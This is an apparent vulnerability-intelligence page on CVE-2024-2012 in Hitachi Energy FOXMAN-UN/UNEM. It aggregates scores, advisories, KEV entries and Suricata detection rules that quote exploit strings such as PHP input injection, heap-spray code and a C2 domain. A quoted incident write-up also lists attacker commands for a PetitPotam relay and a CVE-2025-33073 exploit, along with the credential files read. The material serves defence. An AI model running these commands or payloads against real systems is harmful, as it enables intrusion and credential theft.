CVE-2024-2012
published 2024-06-11CVE-2024-2012: vulnerability exists in the FOXMAN-UN/UNEM server / API Gateway that if exploited an attacker could use to allow unintended commands or code to be executed on…
PriorityP355critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EPSS
0.60%
44.3th percentile
vulnerability exists in the FOXMAN-UN/UNEM server / API Gateway that if exploited an attacker could use to allow unintended commands or
code to be executed on the UNEM server allowing sensitive data to
be read or modified or could cause other unintended behavior
Affected
35 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hitachi_energy | foxman-un | — | — |
| hitachi_energy | foxman-un | — | — |
| hitachi_energy | foxman-un | — | — |
| hitachi_energy | foxman-un | — | — |
| hitachi_energy | unem | — | — |
| hitachi_energy | unem | — | — |
| hitachi_energy | unem | — | — |
| hitachi_energy | unem | — | — |
| hitachi_energy | unem | — | — |
| hitachienergy | foxman-un | — | — |
| hitachienergy | foxman-un | — | — |
| hitachienergy | foxman-un | — | — |
| hitachienergy | foxman-un | — | — |
| hitachienergy | unem | — | — |
| hitachienergy | unem | — | — |
| hitachienergy | unem | — | — |
| hitachienergy | unem | — | — |
| msrc | windows_10 | — | — |
| msrc | windows_10_version_1607 | — | — |
| msrc | windows_10_version_1809 | — | — |
| msrc | windows_10_version_21h2 | — | — |
| msrc | windows_10_version_22h2 | — | — |
| msrc | windows_11_version_21h2 | — | — |
| msrc | windows_11_version_22h2 | — | — |
| msrc | windows_11_version_23h2 | — | — |
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck10.0CRITICAL
cisa8.8HIGH
vendor_msrc9.8CRITICAL
vendor_redhat5.5MEDIUM
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-73c8-ph6w-g64x: vulnerability exists in the FOXMAN-UN/UNEM server / API Gateway that if exploited an attacker could use to allow unintended commands or
code to be exe
ghsa_unreviewed·2024-06-11
CVE-2024-2012 [CRITICAL] CWE-288 GHSA-73c8-ph6w-g64x: vulnerability exists in the FOXMAN-UN/UNEM server / API Gateway that if exploited an attacker could use to allow unintended commands or
code to be exe
vulnerability exists in the FOXMAN-UN/UNEM server / API Gateway that if exploited an attacker could use to allow unintended commands or
code to be executed on the UNEM server allowing sensitive data to
be read or modified or could cause other unintended behavior
VulnCheck
Palo Alto Networks PAN-OS Command Injection Vulnerability
vulncheck·2024·CVSS 10.0
CVE-2024-3400 [CRITICAL] CWE-20 Palo Alto Networks PAN-OS Command Injection Vulnerability
Palo Alto Networks PAN-OS Command Injection Vulnerability
Palo Alto Networks PAN-OS GlobalProtect feature contains a command injection vulnerability that allows an unauthenticated attacker to execute commands with root privileges on the firewall.
Affected: Palo Alto Networks PAN-OS
Required Action: Apply mitigations per vendor instructions as they become available. Otherwise, users with vulnerable versions of affected devices should enable Threat Prevention IDs available from the vendor. See the vendor bulletin for more details and a patch release schedule.
Known Ransomware Campaign Use: Known
Exploitation References: https://security.paloaltonetworks.com/CVE-2024-3400; https://unit42.paloaltonetworks.com/cve-2024-3400/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_v
VulnCheck
Fortinet FortiManager Missing Authentication Vulnerability
vulncheck·2024·CVSS 9.8
CVE-2024-47575 [CRITICAL] CWE-306 Fortinet FortiManager Missing Authentication Vulnerability
Fortinet FortiManager Missing Authentication Vulnerability
Fortinet FortiManager contains a missing authentication vulnerability in the fgfmd daemon that allows a remote, unauthenticated attacker to execute arbitrary code or commands via specially crafted requests.
Affected: Fortinet FortiManager
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://cloud.google.com/blog/topics/threat-intelligence/fortimanager-zero-day-exploitation-cve-2024-47575; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.fortiguard.com/psirt/FG-IR-24-423; https://www.runzero.com/blog/fortinet-fortimanager/; https://darktrace.com/blog/post-exploitation-activities
VulnCheck
Palo Alto Networks PAN-OS Management Interface Authentication Bypass Vulnerability
vulncheck·2024·CVSS 9.3
CVE-2024-0012 [CRITICAL] CWE-306 Palo Alto Networks PAN-OS Management Interface Authentication Bypass Vulnerability
Palo Alto Networks PAN-OS Management Interface Authentication Bypass Vulnerability
Palo Alto Networks PAN-OS contains an authentication bypass vulnerability in the web-based management interface for several PAN-OS products, including firewalls and VPN concentrators.
Affected: Palo Alto Networks PAN-OS
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable. Additionally, management interface for affected devices should not be exposed to untrusted networks, including the internet.
Known Ransomware Campaign Use: Known
Exploitation References: https://security.paloaltonetworks.com/CVE-2024-0012; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://dashboard.shadowserver.org/statist
VulnCheck
Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability
vulncheck·2024·CVSS 6.9
CVE-2024-9474 [MEDIUM] CWE-77 Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability
Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability
Palo Alto Networks PAN-OS contains an OS command injection vulnerability that allows for privilege escalation through the web-based management interface for several PAN products, including firewalls and VPN concentrators.
Affected: Palo Alto Networks PAN-OS
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable. Additionally, the management interfaces for affected devices should not be exposed to untrusted networks, including the internet.
Known Ransomware Campaign Use: Known
Exploitation References: https://security.paloaltonetworks.com/CVE-2024-9474; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json;
CISA ICS
Hitachi Energy UNEM
cisa_ics·2025-01-30·CVSS 8.6
[HIGH] Hitachi Energy UNEM
ICS Advisory
##
Hitachi Energy UNEM
Release DateJanuary 30, 2025
Alert CodeICSA-25-030-01
Related topics:
Industrial Control System Vulnerabilities, Industrial Control Systems
View CSAF
## 1. EXECUTIVE SUMMARY
- CVSS v3 10.0
- ATTENTION: Exploitable remotely/low attack complexity
- Vendor: Hitachi Energy
- Equipment: UNEM
- Vulnerabilities: Authentication Bypass Using an Alternate Path or Channel, Argument Injection, Heap-based Buffer Overflow, Improper Certificate Validation, Use of Hard-coded Password, Improper Restriction of Excessive Authentication Attempts, Cleartext Storage of Sensitive Information, Incorrect User Management
## 2. RISK EVALUATION
Successful exploitation of these vulnerabilities could allow an attacker to cause a denial of service,
CISA ICS
Hitachi Energy FOXMAN-UN
cisa_ics·2025-01-14·CVSS 8.6
[HIGH] Hitachi Energy FOXMAN-UN
ICS Advisory
##
Hitachi Energy FOXMAN-UN
Release DateJanuary 14, 2025
Alert CodeICSA-25-014-01
Related topics:
Industrial Control System Vulnerabilities, Industrial Control Systems
View CSAF
## 1. EXECUTIVE SUMMARY
- CVSS v3 10.0
- ATTENTION: Exploitable remotely/low attack complexity
- Vendor: Hitachi Energy
- Equipment: FOXMAN-UN
- Vulnerabilities: Authentication Bypass Using an Alternate Path or Channel, Improper Neutralization of Argument Delimiters in a Command ('Argument Injection'), Heap-based Buffer Overflow, Incorrect User Management, Improper Certificate Validation, Improper Restriction of Excessive Authentication Attempts, Use of Hard-coded Password, Cleartext Storage of Sensitive Information
## 2. RISK EVALUATION
Successful exploitation of t
CISA
Microsoft Internet Explorer Use-After-Free Vulnerability
cisa·2024-07-23·CVSS 8.8
CVE-2012-4792 [HIGH] CWE-416 Microsoft Internet Explorer Use-After-Free Vulnerability
Vulnerability: Microsoft Internet Explorer Use-After-Free Vulnerability
Affected: Microsoft Internet Explorer
Microsoft Internet Explorer contains a use-after-free vulnerability that allows a remote attacker to execute arbitrary code via a crafted web site that triggers access to an object that (1) was not properly allocated or (2) is deleted, as demonstrated by a CDwnBindInfo object.
Required Action: The impacted product is end-of-life and should be disconnected if still in use.
Notes: https://learn.microsoft.com/en-us/lifecycle/products/internet-explorer-11; https://nvd.nist.gov/vuln/detail/CVE-2012-4792
Remediation Due Date: 2024-08-13
Suricata
ET WEB_SERVER PHP.//Input in HTTP POST
suricata·2014-11-25
CVE-2012-1823 ET WEB_SERVER PHP.//Input in HTTP POST
ET WEB_SERVER PHP.//Input in HTTP POST
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER PHP.//Input in HTTP POST"; flow:established,to_server; http.method; content:"POST"; http.uri.raw; content:"php|3a 2f 2f|input"; fast_pattern; http.request_body; content:"<?"; startswith; reference:url,www.deependresearch.org/2014/07/another-linux-ddos-bot-via-cve-2012-1823.html; classtype:trojan-activity; sid:2019804; rev:5; metadata:created_at 2014_11_25, signature_severity Major, updated_at 2024_04_12;)
Suricata
ET MALWARE Bossabot DDoS tool RFI attempt
suricata·2014-09-22·CVSS 9.8
CVE-2012-1823 [CRITICAL] ET MALWARE Bossabot DDoS tool RFI attempt
ET MALWARE Bossabot DDoS tool RFI attempt
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET MALWARE Bossabot DDoS tool RFI attempt"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"php?-d|20|allow_url"; fast_pattern; content:"auto_prepend_file|3d|php|3a 2f|"; http.request_body; content:"<?php|0d 0a|"; startswith; reference:url,www.kernelmode.info/forum/viewtopic.php?f=16&t=3476&p=23965#p23965; reference:url,cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1823; classtype:trojan-activity; sid:2019212; rev:5; metadata:created_at 2014_09_22, signature_severity Major, tag CISA_KEV, updated_at 2024_04_13;)
Suricata
ET MALWARE EvilGrab/Vidgrab Checkin
suricata·2013-09-04
CVE-2012-0158 ET MALWARE EvilGrab/Vidgrab Checkin
ET MALWARE EvilGrab/Vidgrab Checkin
Rule: alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"ET MALWARE EvilGrab/Vidgrab Checkin"; flow:established,to_server; content:"|7c 28|"; pcre:"/^\d{1,3}\x2e\d{1,3}\x2e\d{1,3}\x2e\d{1,3}/R"; content:"|29 7c|"; within:2; pcre:"/^\d{1,5}/R"; content:"|7c|Win"; within:4; reference:url,contagiodump.blogspot.com.br/2013/09/sandbox-miming-cve-2012-0158-in-mhtml.html; classtype:command-and-control; sid:2017413; rev:4; metadata:created_at 2013_09_04, signature_severity Major, updated_at 2024_03_06;)
Suricata
ET WEB_SPECIFIC_APPS MoinMoin twikidraw Action Traversal File Upload
suricata·2013-06-28
CVE-2012-6081 ET WEB_SPECIFIC_APPS MoinMoin twikidraw Action Traversal File Upload
ET WEB_SPECIFIC_APPS MoinMoin twikidraw Action Traversal File Upload
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS MoinMoin twikidraw Action Traversal File Upload"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"?action=twikidraw"; fast_pattern; content:"&target="; distance:0; content:"../moin.wsgi"; endswith; reference:bugtraq,57082; reference:cve,2012-6081; reference:url,packetstormsecurity.com/files/122079/moinmoin_twikidraw.rb.txt; reference:url,exploit-db.com/exploits/25304/; classtype:web-application-attack; sid:2017074; rev:6; metadata:created_at 2013_06_28, cve CVE_2012_6081, signature_severity Major, updated_at 2024_03_06, reviewed_at 2024_02_06;)
Suricata
ET EXPLOIT Possible 2012-1533 altjvm RCE via JNLP command injection
suricata·2013-06-13
CVE-2012-1533 ET EXPLOIT Possible 2012-1533 altjvm RCE via JNLP command injection
ET EXPLOIT Possible 2012-1533 altjvm RCE via JNLP command injection
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT Possible 2012-1533 altjvm RCE via JNLP command injection"; flow:established,to_client; file.data; content:"<jnlp"; nocase; content:"initial-heap-size"; nocase; content:"max-heap-size"; content:"-XXaltjvm"; nocase; fast_pattern; reference:cve,2012-1533; classtype:trojan-activity; sid:2017013; rev:4; metadata:created_at 2013_06_13, cve CVE_2012_1533, confidence Medium, signature_severity Major, updated_at 2024_03_13, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movement, mitre_technique_id T1210, mitre_technique_name Exploitation_Of_Remote_Services;)
Suricata
ET MALWARE CFR DRIVEBY CVE-2012-4792 DNS Query for C2 domain
suricata·2012-12-30·CVSS 8.8
CVE-2012-4792 [HIGH] ET MALWARE CFR DRIVEBY CVE-2012-4792 DNS Query for C2 domain
ET MALWARE CFR DRIVEBY CVE-2012-4792 DNS Query for C2 domain
Rule: alert dns $HOME_NET any -> any any (msg:"ET MALWARE CFR DRIVEBY CVE-2012-4792 DNS Query for C2 domain"; dns.query; content:"provide.yourtrap.com"; startswith; fast_pattern; nocase; endswith; reference:cve,2012-4792; reference:url,github.com/rapid7/metasploit-framework/commit/6cb9106218bde56fc5e8d72c66fbba9f11c24449; reference:url,eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/; classtype:command-and-control; sid:2016135; rev:7; metadata:affected_product Any, attack_target Client_Endpoint, created_at 2012_12_30, cve CVE_2012_4792, deployment Perimeter, confidence Medium, signature_severity Major, tag DriveBy, tag CISA_KEV, updated_at 2024_04_13;)
Suricata
ET WEB_CLIENT Microsoft Rich Text File .RTF File download with invalid listoverridecount
suricata·2012-12-12
CVE-2012-2539 ET WEB_CLIENT Microsoft Rich Text File .RTF File download with invalid listoverridecount
ET WEB_CLIENT Microsoft Rich Text File .RTF File download with invalid listoverridecount
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_CLIENT Microsoft Rich Text File .RTF File download with invalid listoverridecount"; flow:established,to_client; file.data; content:"|5c|listoverridetable"; distance:0; content:"|5c|listoverride|5c|"; fast_pattern; content:"|5c|listoverridecount"; isdataat:2,relative; pcre:"/^(?:0*?[19]\d|[^190])/R"; reference:cve,2012-2539; classtype:attempted-user; sid:2018315; rev:7; metadata:affected_product Web_Browsers, affected_product Web_Browser_Plugins, attack_target Client_Endpoint, created_at 2012_12_12, cve CVE_2012_2539, deployment Perimeter, signature_severity Major, tag Web_Client_Attacks, updated_at 2024_03_13;)
Suricata
ET WEB_CLIENT Microsoft Rich Text File download - SET
suricata·2012-10-10
CVE-2012-0183 ET WEB_CLIENT Microsoft Rich Text File download - SET
ET WEB_CLIENT Microsoft Rich Text File download - SET
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_CLIENT Microsoft Rich Text File download - SET"; flow:established,to_client; flowbits:set,ET.http.rtf.download; flowbits:noalert; file.data; content:"|7B 5C 72 74 66 31|"; within:6; reference:cve,2012-0183; classtype:attempted-user; sid:2015790; rev:4; metadata:affected_product Web_Browsers, affected_product Web_Browser_Plugins, attack_target Client_Endpoint, created_at 2012_10_10, cve CVE_2012_0183, deployment Perimeter, confidence Medium, signature_severity Major, tag Web_Client_Attacks, updated_at 2024_03_14;)
Suricata
ET WEB_CLIENT Microsoft Excel file download - SET 1
suricata·2012-05-10
CVE-2012-0185 ET WEB_CLIENT Microsoft Excel file download - SET 1
ET WEB_CLIENT Microsoft Excel file download - SET 1
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_CLIENT Microsoft Excel file download - SET 1"; flow:established,to_client; flowbits:isset,OLE.CompoundFile; flowbits:set,ETPRO.Microsoft.Excel; flowbits:noalert; file.data; content:"|09 08 10 00 00 06 05 00|"; distance:512; content:"|57006F0072006B0062006F006F006B00|"; fast_pattern; reference:cve,2012-0185; classtype:attempted-user; sid:2025086; rev:9; metadata:affected_product Web_Browsers, affected_product Web_Browser_Plugins, attack_target Client_Endpoint, created_at 2012_05_10, cve CVE_2012_0185, deployment Perimeter, confidence Medium, signature_severity Major, tag Web_Client_Attacks, updated_at 2024_03_14;)
Suricata
ET WEB_CLIENT Hostile Microsoft Rich Text File (RTF) with corrupted listoverride
suricata·2012-05-08
CVE-2012-0183 ET WEB_CLIENT Hostile Microsoft Rich Text File (RTF) with corrupted listoverride
ET WEB_CLIENT Hostile Microsoft Rich Text File (RTF) with corrupted listoverride
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_CLIENT Hostile Microsoft Rich Text File (RTF) with corrupted listoverride"; flow:established,to_client; flowbits:set,ETPRO.RTF; file.data; content:"|7b 5c 2a 5c|listoverridetable"; content:"|5c|listoverride|5c|"; fast_pattern; pcre:"/\x5clistoverride\x5c((?!\x5cls\d{1,4}\s*\}).)+?\x5clistoverride\x5c/s"; reference:cve,2012-0183; classtype:attempted-user; sid:2025085; rev:5; metadata:affected_product Web_Browsers, affected_product Web_Browser_Plugins, attack_target Client_Endpoint, created_at 2012_05_08, cve CVE_2012_0183, deployment Perimeter, signature_severity Major, tag Web_Client_Attacks, updated_at 2024_04_06;)
Suricata
ET DOS Microsoft Remote Desktop (RDP) Syn/Ack Outbound Flowbit Set
suricata·2012-03-15
CVE-2012-0152 ET DOS Microsoft Remote Desktop (RDP) Syn/Ack Outbound Flowbit Set
ET DOS Microsoft Remote Desktop (RDP) Syn/Ack Outbound Flowbit Set
Rule: alert tcp $HOME_NET 3389 -> any any (msg:"ET DOS Microsoft Remote Desktop (RDP) Syn/Ack Outbound Flowbit Set"; flow:from_server; flowbits:isnotset,ms.rdp.synack; flowbits:set,ms.rdp.synack; flowbits:noalert; flags:SA; reference:cve,2012-0152; classtype:not-suspicious; sid:2014385; rev:6; metadata:created_at 2012_03_15, cve CVE_2012_0152, signature_severity Major, updated_at 2024_03_14;)
Suricata
ET WEB_CLIENT Microsoft Windows Media component specific exploit
suricata·2012-01-28
CVE-2012-0003 ET WEB_CLIENT Microsoft Windows Media component specific exploit
ET WEB_CLIENT Microsoft Windows Media component specific exploit
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_CLIENT Microsoft Windows Media component specific exploit"; flow:established,to_client; file.data; content:"bang()"; content:"cloned"; distance:0; content:"unescape(|22|%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c|22|)"; fast_pattern; distance:0; reference:cve,2012-0003; classtype:attempted-user; sid:2014156; rev:7; metadata:affected_product Web_Browsers, affected_product Web_Browser_Plugins, attack_target Client_Endpoint, created_at 2012_01_28, cve CVE_2012_0003, deployment Perimeter, signature_severity Major, tag Web_Client_Attacks, updated_at 2024_04_08;)
Suricata
ET MALWARE Dooptroop CnC Beacon
suricata·2012-01-10
CVE-2011-3544 ET MALWARE Dooptroop CnC Beacon
ET MALWARE Dooptroop CnC Beacon
Rule: alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET MALWARE Dooptroop CnC Beacon"; flow:established,to_server; http.method; content:"GET"; http.uri; content:".php?num="; fast_pattern; content:"&rev="; distance:0; pcre:"/^\/[a-z]+\.php\?num=\d+&rev=/"; http.header_names; to_lowercase; content:!"|0d 0a|referer|0d 0a|"; reference:url,blog.eset.com/2012/03/17/drive-by-ftp-a-new-view-of-cve-2011-3544; classtype:command-and-control; sid:2014112; rev:7; metadata:attack_target Client_Endpoint, created_at 2012_01_10, deployment Perimeter, signature_severity Major, tag c2, updated_at 2024_04_20, mitre_tactic_id TA0010, mitre_tactic_name Exfiltration, mitre_technique_id T1041, mitre_technique_name Exfiltration_Over_C2_Channel;)
Suricata
ET WEB_SERVER ASP.NET Forms Authentication Bypass
suricata·2012-01-03
CVE-2011-3416 ET WEB_SERVER ASP.NET Forms Authentication Bypass
ET WEB_SERVER ASP.NET Forms Authentication Bypass
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER ASP.NET Forms Authentication Bypass"; flow:established,to_server; http.uri; content:"/CreatingUserAccounts.aspx"; fast_pattern; http.request_body; content:"CreateUserStepContainer"; content:"UserName="; distance:0; content:"%00"; distance:0; pcre:"/UserName\x3d[^\x26]+\x2500/"; reference:cve,2011-3416; classtype:attempted-user; sid:2014100; rev:7; metadata:created_at 2012_01_03, cve CVE_2011_3416, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_11_26, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Pub
No public exploits indexed.
Microsoft
From edge appliance to enterprise compromise: Multi-stage Linux intrusion via F5 and Confluence
blogs_microsoft·2026-05-22·CVSS 8.8
CVE-2025-33073 [HIGH] From edge appliance to enterprise compromise: Multi-stage Linux intrusion via F5 and Confluence
After compromising the Confluence server, the threat actor obtained credentials and used them to attempt authentication against Windows infrastructure from the following files:
/opt/atlassian/confluence/conf/server.xml
/var/atlassian/application-data/confluence/confluence.cfg.xml
This was followed by Kerberos relay attacks and exploitation of CVE-2025-33073, highlighting the risk of credential theft from internal web applications and the importance of monitoring cross-system authentication events.
nxc smb [REDACTED_IP] -d [REDACTED_DOMAIN].com -u Jiraservices -p '********* -M coerce_plus -o M=PetitPotam L="localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA"
python3 CVE-2025-33073.py -u [REDACTED_DOMAIN].com\Jiraservices -p ******** --attacker-ip [REDACTED_IP] --dns-ip [REDACTED_IP]
Bleepingcomputer
Microsoft fixes Linux boot issues on dual-boot Windows systems
blogs_bleepingcomputer·2025-05-14·CVSS 8.6
[HIGH] Microsoft fixes Linux boot issues on dual-boot Windows systems
## Microsoft fixes Linux boot issues on dual-boot Windows systems
## Sergiu Gatlan
Microsoft has fixed a known issue preventing Linux from booting on dual-boot systems with Secure Boot enabled after installing the August 2024 Windows security updates.
The list of affected systems includes those running client (Windows 10 and Windows 11) and server (Windows Server 2012 and later) OS versions.
This issue is triggered by a Secure Boot Advanced Targeting (SBAT) update that blocks UEFI shim bootloaders vulnerable to exploits targeting the CVE-2022-2601 GRUB2 Secure Boot bypass.
While Microsoft said in the CVE-2022-2601 advisory that this SBAT update would not be delivered to devices where dual booting is detected, it also acknowledged that the dual-boot detection failed to detect some cust
2024-06-11
Published